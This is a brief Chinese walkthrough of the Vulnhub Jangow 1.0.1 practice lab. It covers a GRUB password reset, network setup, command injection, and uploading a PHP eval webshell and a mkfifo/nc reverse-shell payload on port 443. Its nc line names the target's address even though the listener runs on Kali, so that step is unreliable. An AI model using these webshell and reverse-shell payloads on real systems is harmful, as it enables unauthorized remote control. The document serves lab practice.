jangow下载地址:https://www.vulnhub.com/entry/jangow-101,754/
修改配置
选第二行下箭头---》回车
选第二行按e进行编辑
删除"recovery nomodeset"并在末尾添加"quiet splash rw init=/bin/bash"
输入passwd修改密码
用NAT模式
编辑文件:vim /etc/network/interfaces
(有的电脑打不了‘/’ 我们可以cd etc ,到etc下cd network ,在进行vim interfaces)
将网卡信息设置为自己的网卡
重启虚拟机查看ip
到物理机访问靶机的IP地址点Buscar
点开site文件
ulr输入whoami发现传参点
尝试上传木马文件
echo '<?php @eval($_POST["sain"]);' > 333.php
连接
写入一个php反弹shell文件(测试该靶机仅有443端口反弹shell)在本地写好蚁剑上传
<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 靶机地址 443 >/tmp/f');?>
kali监听443端口
nc -lvvp 443
访问123.php文件
即可反弹shell